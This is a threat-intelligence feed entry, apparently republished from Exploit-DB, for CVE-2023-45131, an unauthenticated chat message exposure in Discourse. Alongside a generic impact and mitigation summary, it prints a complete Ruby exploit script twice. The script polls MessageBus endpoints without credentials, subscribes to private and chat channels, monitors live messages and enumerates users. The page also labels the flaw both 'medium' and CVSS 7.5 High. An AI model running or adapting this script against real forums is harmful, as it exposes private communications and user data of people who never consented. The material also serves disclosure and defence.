Discourse 3.1.1 - Unauthenticated Chat Message Access

Severity: mediumType: exploit

AI Analysis

Technical Summary

The security threat pertains to Discourse version 3.1.1, an open-source discussion platform widely used for online forums and community engagement. The vulnerability allows unauthenticated access to chat messages, meaning that an attacker without any valid credentials can view chat content that should normally be restricted to authenticated users. This type of unauthorized access indicates a flaw in the access control mechanisms of the chat feature within Discourse 3.1.1. Since chat messages often contain sensitive or private communications, this exposure can lead to confidentiality breaches. The exploit is categorized as a web-based exploit, leveraging the web interface of Discourse. Although the affected versions are not explicitly listed beyond 3.1.1, the presence of exploit code (not in a specific programming language but as text) suggests that the vulnerability can be practically leveraged by attackers. The lack of patch links indicates that a fix may not yet be publicly available or widely distributed, increasing the risk for organizations still running this version. The exploit does not require authentication, which lowers the barrier for attackers and increases the threat severity. However, the absence of known exploits in the wild suggests it may not yet be actively exploited on a large scale.

Potential Impact

For European organizations using Discourse 3.1.1, this vulnerability poses a significant risk to the confidentiality of internal and external communications conducted via the platform's chat feature. Sensitive discussions, strategic planning, or personal information shared in chat rooms could be exposed to unauthorized parties. This could lead to reputational damage, regulatory compliance issues (especially under GDPR, which mandates protection of personal data), and potential intellectual property theft. Organizations in sectors such as finance, healthcare, government, and critical infrastructure, which often rely on secure communication platforms, are particularly vulnerable. The ease of exploitation without authentication means that attackers can quickly gather intelligence or sensitive data without needing to compromise user credentials, increasing the likelihood of data leakage and subsequent targeted attacks.

Mitigation Recommendations

Organizations should immediately assess their Discourse installations to determine if version 3.1.1 is in use. If so, they should prioritize upgrading to a later, patched version of Discourse once available. In the interim, administrators can implement network-level access controls to restrict access to the chat feature, such as IP whitelisting or VPN requirements. Additionally, monitoring web server logs for unusual access patterns to chat endpoints can help detect exploitation attempts. Employing web application firewalls (WAFs) with custom rules to block unauthenticated access to chat message endpoints may provide temporary protection. Organizations should also review and tighten permissions and authentication mechanisms around chat features and consider disabling chat functionality if it is not critical. Regular backups and incident response plans should be updated to handle potential data breaches stemming from this vulnerability.

Affected Countries

Germany, France, United Kingdom, Netherlands, Sweden, Italy, Spain, Belgium

Indicators of Compromise

exploit-code: #!/usr/bin/env ruby # Title : Discourse 3.1.1 - Unauthenticated Chat Message Access # CVE-2023-45131 # CVSS: 7.5 (High) # Affected: Discourse < 3.1.1 stable, < 3.2.0.beta2 # Author ibrahimsql @ https://twitter.com/ibrahmsql # Date: 2023-12-14 require 'net/http' require 'uri' require 'json' require 'openssl' require 'base64' class CVE202345131 def initialize(target_url) @target_url = target_url.chomp('/') @results = [] @message_bus_client_id = nil @csrf_token = nil end def run_exploit puts "\n[*] Testing CVE-2023-45131: Discourse Unauthenticated Chat Message Access" puts "[*] Target: #{@target_url}" puts "[*] CVSS Score: 7.5 (High)" puts "[*] Affected: Discourse < 3.1.1 stable, < 3.2.0.beta2\n" # Test MessageBus access test_messagebus_access test_chat_channel_enumeration test_private_message_access test_real_time_monitoring test_message_history_access test_user_enumeration_via_chat generate_report @results end private def test_messagebus_access puts "[*] Testing MessageBus unauthenticated access..." begin # Get MessageBus client ID uri = URI("#{@target_url}/message-bus/poll") response = make_request(uri, 'GET') if response && response.code == '200' begin data = JSON.parse(response.body) if data.is_a?(Array) && !data.empty? @message_bus_client_id = extract_client_id(response) @results << { vulnerability: "MessageBus Access", severity: "High", description: "Unauthenticated access to MessageBus endpoint confirmed", impact: "Can monitor real-time messages and notifications", client_id: @message_bus_client_id } puts "[+] MessageBus access confirmed - Client ID: #{@message_bus_client_id}" return true end rescue JSON::ParserError # Try alternative endpoints test_alternative_messagebus_endpoints end end rescue => e puts "[!] Error testing MessageBus access: #{e.message}" end false end def test_alternative_messagebus_endpoints puts "[*] Testing alternative MessageBus endpoints..." endpoints = [ "/message-bus/poll", "/message-bus/subscribe", "/message-bus/diagnostics", "/message-bus/long-poll" ] endpoints.each do |endpoint| begin uri = URI("#{@target_url}#{endpoint}") response = make_request(uri, 'GET') if response && response.code == '200' if response.body.include?('message-bus') || response.body.include?('clientId') @results << { vulnerability: "Alternative MessageBus Endpoint", severity: "Medium", endpoint: endpoint, description: "Alternative MessageBus endpoint accessible", impact: "Potential message monitoring capability" } puts "[+] Alternative endpoint accessible: #{endpoint}" end end rescue => e puts "[!] Error testing endpoint #{endpoint}: #{e.message}" end end end def test_chat_channel_enumeration puts "[*] Testing chat channel enumeration..." return unless @message_bus_client_id begin # Try to enumerate chat channels uri = URI("#{@target_url}/message-bus/poll") # Subscribe to chat channels data = { '/chat/new-messages' => -1, '/chat/channel-status' => -1, '/chat/user-tracking' => -1, 'clientId' => @message_bus_client_id } response = make_request(uri, 'POST', data) if response && response.code == '200' begin messages = JSON.parse(response.body) if messages.is_a?(Array) && !messages.empty? chat_channels = extract_chat_channels(messages) if !chat_channels.empty? @results << { vulnerability: "Chat Channel Enumeration", severity: "High", channels: chat_channels, description: "Enumerated accessible chat channels", impact: "Can identify active chat channels and participants" } puts "[+] Chat channels enumerated: #{chat_channels.join(', ')}" end end rescue JSON::ParserError => e puts "[!] Error parsing chat channel response: #{e.message}" end end rescue => e puts "[!] Error enumerating chat channels: #{e.message}" end end def test_private_message_access puts "[*] Testing private message access..." return unless @message_bus_client_id begin # Try to access private messages uri = URI("#{@target_url}/message-bus/poll") # Subscribe to private message channels data = { '/private-messages' => -1, '/chat/private' => -1, '/notification' => -1, 'clientId' => @message_bus_client_id } response = make_request(uri, 'POST', data) if response && response.code == '200' begin messages = JSON.parse(response.body) if messages.is_a?(Array) private_messages = extract_private_messages(messages) if !private_messages.empty? @results << { vulnerability: "Private Message Access", severity: "Critical", messages: private_messages, description: "Accessed private chat messages without authentication", impact: "Complete breach of private communication confidentiality" } puts "[+] Private messages accessed: #{private_messages.length} messages found" # Log sample messages (redacted) private_messages.first(3).each_with_index do |msg, idx| puts " [#{idx + 1}] #{redact_message(msg)}" end end end rescue JSON::ParserError => e puts "[!] Error parsing private message response: #{e.message}" end end rescue => e puts "[!] Error accessing private messages: #{e.message}" end end def test_real_time_monitoring puts "[*] Testing real-time message monitoring..." return unless @message_bus_client_id begin puts "[*] Monitoring for 10 seconds..." start_time = Time.now monitored_messages = [] while (Time.now - start_time) < 10 uri = URI("#{@target_url}/message-bus/poll") data = { '/chat/new-messages' => 0, 'clientId' => @message_bus_client_id } response = make_request(uri, 'POST', data) if response && response.code == '200' begin messages = JSON.parse(response.body) if messages.is_a?(Array) && !messages.empty? new_messages = extract_new_messages(messages) monitored_messages.concat(new_messages) end rescue JSON::ParserError # Continue monitoring end end sleep(1) end if !monitored_messages.empty? @results << { vulnerability: "Real-time Message Monitoring", severity: "High", messages_count: monitored_messages.length, description: "Successfully monitored real-time chat messages", impact: "Can intercept live communications" } puts "[+] Real-time monitoring successful: #{monitored_messages.length} messages intercepted" else puts "[-] No real-time messages detected during monitoring period" end rescue => e puts "[!] Error during real-time monitoring: #{e.message}" end end def test_message_history_access puts "[*] Testing message history access..." begin # Try to access message history through various endpoints history_endpoints = [ "/chat/api/channels", "/chat/api/messages", "/chat/history", "/api/chat/channels.json" ] history_endpoints.each do |endpoint| uri = URI("#{@target_url}#{endpoint}") response = make_request(uri, 'GET') if response && response.code == '200' begin data = JSON.parse(response.body) if data.is_a?(Hash) && (data['messages'] || data['channels'] || data['chat']) @results << { vulnerability: "Message History Access", severity: "High", endpoint: endpoint, description: "Accessed chat message history without authentication", impact: "Historical chat data exposure" } puts "[+] Message history accessible via: #{endpoint}" end rescue JSON::ParserError # Check for HTML responses that might contain chat data if response.body.include?('chat') && response.body.include?('message') @results << { vulnerability: "Message History Exposure", severity: "Medium", endpoint: endpoint, description: "Chat-related content found in response", impact: "Potential information disclosure" } puts "[+] Chat-related content found in: #{endpoint}" end end end end rescue => e puts "[!] Error testing message history access: #{e.message}" end end def test_user_enumeration_via_chat puts "[*] Testing user enumeration via chat features..." begin # Try to enumerate users through chat-related endpoints user_endpoints = [ "/chat/api/users", "/chat/users.json", "/api/chat/users", "/chat/members" ] user_endpoints.each do |endpoint| uri = URI("#{@target_url}#{endpoint}") response = make_request(uri, 'GET') if response && response.code == '200' begin data = JSON.parse(response.body) if data.is_a?(Hash) && (data['users'] || data['members']) users = extract_users_from_chat(data) if !users.empty? @results << { vulnerability: "User Enumeration via Chat", severity: "Medium", endpoint: endpoint, users_count: users.length, sample_users: users.first(5), description: "Enumerated chat users without authentication", impact: "User information disclosure" } puts "[+] Users enumerated via #{endpoint}: #{users.length} users found" end end rescue JSON::ParserError # Continue with next endpoint end end end rescue => e puts "[!] Error testing user enumeration: #{e.message}" end end def extract_client_id(response) # Extract client ID from response headers or body if response['X-MessageBus-Client-Id'] return response['X-MessageBus-Client-Id'] end # Try to extract from response body begin data = JSON.parse(response.body) if data.is_a?(Hash) && data['clientId'] return data['clientId'] end rescue JSON::ParserError end # Generate a random client ID SecureRandom.hex(16) end def extract_chat_channels(messages) channels = [] messages.each do |message| if message.is_a?(Hash) if message['channel'] && message['channel'].include?('/chat/') channels << message['channel'] elsif message['data'] && message['data'].is_a?(Hash) if message['data']['channel_id'] channels << "Channel #{message['data']['channel_id']}" end end end end channels.uniq end def extract_private_messages(messages) private_msgs = [] messages.each do |message| if message.is_a?(Hash) if message['channel'] && (message['channel'].include?('/private') || message['channel'].include?('/chat/private')) private_msgs << { channel: message['channel'], data: message['data'], timestamp: message['timestamp'] || Time.now.to_i } elsif message['data'] && message['data'].is_a?(Hash) if message['data']['message'] || message['data']['content'] private_msgs << { content: message['data']['message'] || message['data']['content'], user: message['data']['user'] || message['data']['username'], timestamp: message['data']['timestamp'] || Time.now.to_i } end end end end private_msgs end def extract_new_messages(messages) new_msgs = [] messages.each do |message| if message.is_a?(Hash) && message['data'] new_msgs << { channel: message['channel'], data: message['data'], timestamp: Time.now.to_i } end end new_msgs end def extract_users_from_chat(data) users = [] if data['users'] && data['users'].is_a?(Array) data['users'].each do |user| if user.is_a?(Hash) users << { username: user['username'], id: user['id'], name: user['name'] } end end elsif data['members'] && data['members'].is_a?(Array) data['members'].each do |member| if member.is_a?(Hash) users << { username: member['username'] || member['user'], id: member['id'] || member['user_id'] } end end end users end def redact_message(message) if message.is_a?(Hash) content = message[:content] || message['content'] || message[:data] || 'N/A' user = message[:user] || message['user'] || 'Unknown' "User: #{user}, Content: #{content.to_s[0..50]}..." else message.to_s[0..50] + "..." end end def make_request(uri, method = 'GET', data = nil, headers = {}) begin http = Net::HTTP.new(uri.host, uri.port) http.use_ssl = (uri.scheme == 'https') http.verify_mode = OpenSSL::SSL::VERIFY_NONE if http.use_ssl? http.read_timeout = 10 http.open_timeout = 10 request = case method.upcase when 'GET' Net::HTTP::Get.new(uri.request_uri) when 'POST' req = Net::HTTP::Post.new(uri.request_uri) if data if data.is_a?(Hash) req.set_form_data(data) else req.body = data req['Content-Type'] = 'application/json' end end req end # Set headers request['User-Agent'] = 'Mozilla/5.0 (compatible; DiscourseMap/2.0)' request['Accept'] = 'application/json, text/javascript, */*; q=0.01' request['X-Requested-With'] = 'XMLHttpRequest' headers.each { |key, value| request[key] = value } response = http.request(request) return response rescue => e puts "[!] Request failed: #{e.message}" return nil end end def generate_report puts "\n" + "="*60 puts "CVE-2023-45131 Exploitation Report" puts "="*60 puts "Target: #{@target_url}" puts "Vulnerabilities Found: #{@results.length}" if @results.empty? puts "[+] No chat message access vulnerabilities detected" else puts "\n[!] VULNERABILITIES DETECTED:" @results.each_with_index do |result, index| puts "\n#{index + 1}. #{result[:vulnerability]}" puts " Severity: #{result[:severity]}" puts " Description: #{result[:description]}" puts " Impact: #{result[:impact]}" if result[:messages_count] puts " Messages Found: #{result[:messages_count]}" end if result[:channels] puts " Channels: #{result[:channels].join(', ')}" end if result[:endpoint] puts " Endpoint: #{result[:endpoint]}" end end puts "\n[!] REMEDIATION:" puts "1. Update Discourse to version 3.1.1 stable or 3.2.0.beta2 or later" puts "2. Implement proper authentication for MessageBus endpoints" puts "3. Review and restrict access to chat-related APIs" puts "4. Monitor MessageBus access logs for suspicious activity" puts "5. Consider disabling chat features if not required" end puts "\n" + "="*60 end end # Run the exploit if called directly if __FILE__ == $0 if ARGV.length != 1 puts "Usage: ruby #{$0} <target_url>" puts "Example: ruby #{$0} https://discourse.example.com" exit 1 end target_url = ARGV[0] exploit = CVE202345131.new(target_url) exploit.run_exploit end

Discourse 3.1.1 - Unauthenticated Chat Message Access

Severity: medium

Type: exploit

Discourse 3.1.1 - Unauthenticated Chat Message Access

Technical Summary

Potential Impact

Mitigation Recommendations

Affected Countries

Germany, France, United Kingdom, Netherlands, Sweden, Italy, Spain, Belgium

Indicators of Compromise

exploit-code: #!/usr/bin/env ruby # Title : Discourse 3.1.1 - Unauthenticated Chat Message Access # CVE-2023-45131 # CVSS: 7.5 (High) # Affected: Discourse < 3.1.1 stable, < 3.2.0.beta2 # Author ibrahimsql @ https://twitter.com/ibrahmsql # Date: 2023-12-14 require 'net/http' require 'uri' require 'json' require 'openssl' require 'base64' class CVE202345131 def initialize(target_url) @target_url = target_url.chomp('/') @results = [] @message_bus_client_id = nil @csrf_token = nil end def run_exploit puts "\n[*] Testing CVE-2023-45131: Discourse Unauthenticated Chat Message Access" puts "[*] Target: #{@target_url}" puts "[*] CVSS Score: 7.5 (High)" puts "[*] Affected: Discourse < 3.1.1 stable, < 3.2.0.beta2\n" # Test MessageBus access test_messagebus_access test_chat_channel_enumeration test_private_message_access test_real_time_monitoring test_message_history_access test_user_enumeration_via_chat generate_report @results end private def test_messagebus_access puts "[*] Testing MessageBus unauthenticated access..." begin # Get MessageBus client ID uri = URI("#{@target_url}/message-bus/poll") response = make_request(uri, 'GET') if response && response.code == '200' begin data = JSON.parse(response.body) if data.is_a?(Array) && !data.empty? @message_bus_client_id = extract_client_id(response) @results << { vulnerability: "MessageBus Access", severity: "High", description: "Unauthenticated access to MessageBus endpoint confirmed", impact: "Can monitor real-time messages and notifications", client_id: @message_bus_client_id } puts "[+] MessageBus access confirmed - Client ID: #{@message_bus_client_id}" return true end rescue JSON::ParserError # Try alternative endpoints test_alternative_messagebus_endpoints end end rescue => e puts "[!] Error testing MessageBus access: #{e.message}" end false end def test_alternative_messagebus_endpoints puts "[*] Testing alternative MessageBus endpoints..." endpoints = [ "/message-bus/poll", "/message-bus/subscribe", "/message-bus/diagnostics", "/message-bus/long-poll" ] endpoints.each do |endpoint| begin uri = URI("#{@target_url}#{endpoint}") response = make_request(uri, 'GET') if response && response.code == '200' if response.body.include?('message-bus') || response.body.include?('clientId') @results << { vulnerability: "Alternative MessageBus Endpoint", severity: "Medium", endpoint: endpoint, description: "Alternative MessageBus endpoint accessible", impact: "Potential message monitoring capability" } puts "[+] Alternative endpoint accessible: #{endpoint}" end end rescue => e puts "[!] Error testing endpoint #{endpoint}: #{e.message}" end end end def test_chat_channel_enumeration puts "[*] Testing chat channel enumeration..." return unless @message_bus_client_id begin # Try to enumerate chat channels uri = URI("#{@target_url}/message-bus/poll") # Subscribe to chat channels data = { '/chat/new-messages' => -1, '/chat/channel-status' => -1, '/chat/user-tracking' => -1, 'clientId' => @message_bus_client_id } response = make_request(uri, 'POST', data) if response && response.code == '200' begin messages = JSON.parse(response.body) if messages.is_a?(Array) && !messages.empty? chat_channels = extract_chat_channels(messages) if !chat_channels.empty? @results << { vulnerability: "Chat Channel Enumeration", severity: "High", channels: chat_channels, description: "Enumerated accessible chat channels", impact: "Can identify active chat channels and participants" } puts "[+] Chat channels enumerated: #{chat_channels.join(', ')}" end end rescue JSON::ParserError => e puts "[!] Error parsing chat channel response: #{e.message}" end end rescue => e puts "[!] Error enumerating chat channels: #{e.message}" end end def test_private_message_access puts "[*] Testing private message access..." return unless @message_bus_client_id begin # Try to access private messages uri = URI("#{@target_url}/message-bus/poll") # Subscribe to private message channels data = { '/private-messages' => -1, '/chat/private' => -1, '/notification' => -1, 'clientId' => @message_bus_client_id } response = make_request(uri, 'POST', data) if response && response.code == '200' begin messages = JSON.parse(response.body) if messages.is_a?(Array) private_messages = extract_private_messages(messages) if !private_messages.empty? @results << { vulnerability: "Private Message Access", severity: "Critical", messages: private_messages, description: "Accessed private chat messages without authentication", impact: "Complete breach of private communication confidentiality" } puts "[+] Private messages accessed: #{private_messages.length} messages found" # Log sample messages (redacted) private_messages.first(3).each_with_index do |msg, idx| puts " [#{idx + 1}] #{redact_message(msg)}" end end end rescue JSON::ParserError => e puts "[!] Error parsing private message response: #{e.message}" end end rescue => e puts "[!] Error accessing private messages: #{e.message}" end end def test_real_time_monitoring puts "[*] Testing real-time message monitoring..." return unless @message_bus_client_id begin puts "[*] Monitoring for 10 seconds..." start_time = Time.now monitored_messages = [] while (Time.now - start_time) < 10 uri = URI("#{@target_url}/message-bus/poll") data = { '/chat/new-messages' => 0, 'clientId' => @message_bus_client_id } response = make_request(uri, 'POST', data) if response && response.code == '200' begin messages = JSON.parse(response.body) if messages.is_a?(Array) && !messages.empty? new_messages = extract_new_messages(messages) monitored_messages.concat(new_messages) end rescue JSON::ParserError # Continue monitoring end end sleep(1) end if !monitored_messages.empty? @results << { vulnerability: "Real-time Message Monitoring", severity: "High", messages_count: monitored_messages.length, description: "Successfully monitored real-time chat messages", impact: "Can intercept live communications" } puts "[+] Real-time monitoring successful: #{monitored_messages.length} messages intercepted" else puts "[-] No real-time messages detected during monitoring period" end rescue => e puts "[!] Error during real-time monitoring: #{e.message}" end end def test_message_history_access puts "[*] Testing message history access..." begin # Try to access message history through various endpoints history_endpoints = [ "/chat/api/channels", "/chat/api/messages", "/chat/history", "/api/chat/channels.json" ] history_endpoints.each do |endpoint| uri = URI("#{@target_url}#{endpoint}") response = make_request(uri, 'GET') if response && response.code == '200' begin data = JSON.parse(response.body) if data.is_a?(Hash) && (data['messages'] || data['channels'] || data['chat']) @results << { vulnerability: "Message History Access", severity: "High", endpoint: endpoint, description: "Accessed chat message history without authentication", impact: "Historical chat data exposure" } puts "[+] Message history accessible via: #{endpoint}" end rescue JSON::ParserError # Check for HTML responses that might contain chat data if response.body.include?('chat') && response.body.include?('message') @results << { vulnerability: "Message History Exposure", severity: "Medium", endpoint: endpoint, description: "Chat-related content found in response", impact: "Potential information disclosure" } puts "[+] Chat-related content found in: #{endpoint}" end end end end rescue => e puts "[!] Error testing message history access: #{e.message}" end end def test_user_enumeration_via_chat puts "[*] Testing user enumeration via chat features..." begin # Try to enumerate users through chat-related endpoints user_endpoints = [ "/chat/api/users", "/chat/users.json", "/api/chat/users", "/chat/members" ] user_endpoints.each do |endpoint| uri = URI("#{@target_url}#{endpoint}") response = make_request(uri, 'GET') if response && response.code == '200' begin data = JSON.parse(response.body) if data.is_a?(Hash) && (data['users'] || data['members']) users = extract_users_from_chat(data) if !users.empty? @results << { vulnerability: "User Enumeration via Chat", severity: "Medium", endpoint: endpoint, users_count: users.length, sample_users: users.first(5), description: "Enumerated chat users without authentication", impact: "User information disclosure" } puts "[+] Users enumerated via #{endpoint}: #{users.length} users found" end end rescue JSON::ParserError # Continue with next endpoint end end end rescue => e puts "[!] Error testing user enumeration: #{e.message}" end end def extract_client_id(response) # Extract client ID from response headers or body if response['X-MessageBus-Client-Id'] return response['X-MessageBus-Client-Id'] end # Try to extract from response body begin data = JSON.parse(response.body) if data.is_a?(Hash) && data['clientId'] return data['clientId'] end rescue JSON::ParserError end # Generate a random client ID SecureRandom.hex(16) end def extract_chat_channels(messages) channels = [] messages.each do |message| if message.is_a?(Hash) if message['channel'] && message['channel'].include?('/chat/') channels << message['channel'] elsif message['data'] && message['data'].is_a?(Hash) if message['data']['channel_id'] channels << "Channel #{message['data']['channel_id']}" end end end end channels.uniq end def extract_private_messages(messages) private_msgs = [] messages.each do |message| if message.is_a?(Hash) if message['channel'] && (message['channel'].include?('/private') || message['channel'].include?('/chat/private')) private_msgs << { channel: message['channel'], data: message['data'], timestamp: message['timestamp'] || Time.now.to_i } elsif message['data'] && message['data'].is_a?(Hash) if message['data']['message'] || message['data']['content'] private_msgs << { content: message['data']['message'] || message['data']['content'], user: message['data']['user'] || message['data']['username'], timestamp: message['data']['timestamp'] || Time.now.to_i } end end end end private_msgs end def extract_new_messages(messages) new_msgs = [] messages.each do |message| if message.is_a?(Hash) && message['data'] new_msgs << { channel: message['channel'], data: message['data'], timestamp: Time.now.to_i } end end new_msgs end def extract_users_from_chat(data) users = [] if data['users'] && data['users'].is_a?(Array) data['users'].each do |user| if user.is_a?(Hash) users << { username: user['username'], id: user['id'], name: user['name'] } end end elsif data['members'] && data['members'].is_a?(Array) data['members'].each do |member| if member.is_a?(Hash) users << { username: member['username'] || member['user'], id: member['id'] || member['user_id'] } end end end users end def redact_message(message) if message.is_a?(Hash) content = message[:content] || message['content'] || message[:data] || 'N/A' user = message[:user] || message['user'] || 'Unknown' "User: #{user}, Content: #{content.to_s[0..50]}..." else message.to_s[0..50] + "..." end end def make_request(uri, method = 'GET', data = nil, headers = {}) begin http = Net::HTTP.new(uri.host, uri.port) http.use_ssl = (uri.scheme == 'https') http.verify_mode = OpenSSL::SSL::VERIFY_NONE if http.use_ssl? http.read_timeout = 10 http.open_timeout = 10 request = case method.upcase when 'GET' Net::HTTP::Get.new(uri.request_uri) when 'POST' req = Net::HTTP::Post.new(uri.request_uri) if data if data.is_a?(Hash) req.set_form_data(data) else req.body = data req['Content-Type'] = 'application/json' end end req end # Set headers request['User-Agent'] = 'Mozilla/5.0 (compatible; DiscourseMap/2.0)' request['Accept'] = 'application/json, text/javascript, */*; q=0.01' request['X-Requested-With'] = 'XMLHttpRequest' headers.each { |key, value| request[key] = value } response = http.request(request) return response rescue => e puts "[!] Request failed: #{e.message}" return nil end end def generate_report puts "\n" + "="*60 puts "CVE-2023-45131 Exploitation Report" puts "="*60 puts "Target: #{@target_url}" puts "Vulnerabilities Found: #{@results.length}" if @results.empty? puts "[+] No chat message access vulnerabilities detected" else puts "\n[!] VULNERABILITIES DETECTED:" @results.each_with_index do |result, index| puts "\n#{index + 1}. #{result[:vulnerability]}" puts " Severity: #{result[:severity]}" puts " Description: #{result[:description]}" puts " Impact: #{result[:impact]}" if result[:messages_count] puts " Messages Found: #{result[:messages_count]}" end if result[:channels] puts " Channels: #{result[:channels].join(', ')}" end if result[:endpoint] puts " Endpoint: #{result[:endpoint]}" end end puts "\n[!] REMEDIATION:" puts "1. Update Discourse to version 3.1.1 stable or 3.2.0.beta2 or later" puts "2. Implement proper authentication for MessageBus endpoints" puts "3. Review and restrict access to chat-related APIs" puts "4. Monitor MessageBus access logs for suspicious activity" puts "5. Consider disabling chat features if not required" end puts "\n" + "="*60 end end # Run the exploit if called directly if __FILE__ == $0 if ARGV.length != 1 puts "Usage: ruby #{$0} <target_url>" puts "Example: ruby #{$0} https://discourse.example.com" exit 1 end target_url = ARGV[0] exploit = CVE202345131.new(target_url) exploit.run_exploit end

Source: Exploit-DB RSS Feed

Published: Tue Jul 22 2025

Discourse 3.1.1 - Unauthenticated Chat Message Access

Medium

Exploitweb exploit

Published: Tue Jul 22 2025 (07/22/2025, 00:00:00 UTC)

Source: Exploit-DB RSS Feed

Description

Discourse 3.1.1 - Unauthenticated Chat Message Access

AI-Powered Analysis

AILast updated: 08/18/2025, 01:20:25 UTC

Technical Analysis

Potential Impact

Mitigation Recommendations

Affected Countries

Need more detailed analysis?Get Pro

Pro Feature

For access to advanced analysis and higher rate limits, contact root@offseq.com

Technical Details

Edb Id: 52375
Has Exploit Code: true
Code Language: text

Indicators of Compromise

Exploit Source Code

Exploit Code

Exploit code for Discourse 3.1.1 - Unauthenticated Chat Message Access

#!/usr/bin/env ruby
# Title : Discourse 3.1.1 - Unauthenticated Chat Message Access
# CVE-2023-45131
# CVSS: 7.5 (High)
# Affected: Discourse < 3.1.1 stable, < 3.2.0.beta2
# Author ibrahimsql @ https://twitter.com/ibrahmsql
# Date: 2023-12-14

require 'net/http'
require 'uri'
require 'json'
require 'openssl'
require 'base64'

class CVE202345131
  def initialize(target_url)
    @target_url = target_url.chomp('/')
    @results = []
    @message_bus_client_id = nil
    @csrf_token = nil
  end

  de... (16861 more characters)

Code Length: 17,361 characters

Threat ID: 687ffbf0a915ff00f7fb52b6

Added to database: 7/22/2025, 9:00:32 PM

Last enriched: 8/18/2025, 1:20:25 AM

Last updated: 8/20/2025, 2:22:47 AM